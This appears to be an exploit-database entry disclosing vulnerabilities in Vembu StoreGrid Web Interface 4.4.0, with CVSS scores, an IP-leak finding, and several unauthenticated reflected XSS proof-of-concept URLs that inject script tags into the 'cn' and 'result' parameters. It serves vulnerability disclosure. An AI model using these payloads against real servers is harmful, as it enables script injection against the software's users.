Lucene search

K
exploitpackGionathan RealeEXPLOITPACK:1D5E843B0400D7A1F1F13F50B6846E6B
HistoryMar 15, 2019 - 12:00 a.m.

Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities

2019-03-1500:00:00
Gionathan Reale
25

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities

# Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities 
# Discovery Date: 2018-12-05 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.vembu.com/ 
# Software Link : N/A
# Google Dork: N/A
# Version: 4.4.0 
# CVE : CVE-2014-10078,CVE-2014-10079
Description StoreGrid enables you to offer an automated online backup service to your customers and is designed to be flexible to your needs. Upon investigating the web interface I discovered multiple vulnerabilities. 
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 
Information Disclosure. The front page of the server web interface leaks the private IP address in the hidden form "ipaddress" around line 80. 
========================================================================================================================== 
Reflected XSS. The server web interface contains multiple reflected XSS exploits that do not require authentication. 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxx.xx:6061//interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregsuccess.php?cn=</font><script>alert(1);</script><font>&result= 
https://xxxxxxxxx.xx:6061/interface/registerreseller/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
https://xxxxxxxxx.xx:6061/interface/registerclient/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
https://xxxxxxxx.xx:6061/interface/registercustomer/onlineregfailure.php?cn=gar&result=</font><script>alert(1);</script><font> 
============================================================================================================================= 
Self XSS. The server web interface contains a self XSS in the search function. 
==============================================================================================================================

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

Related for EXPLOITPACK:1D5E843B0400D7A1F1F13F50B6846E6B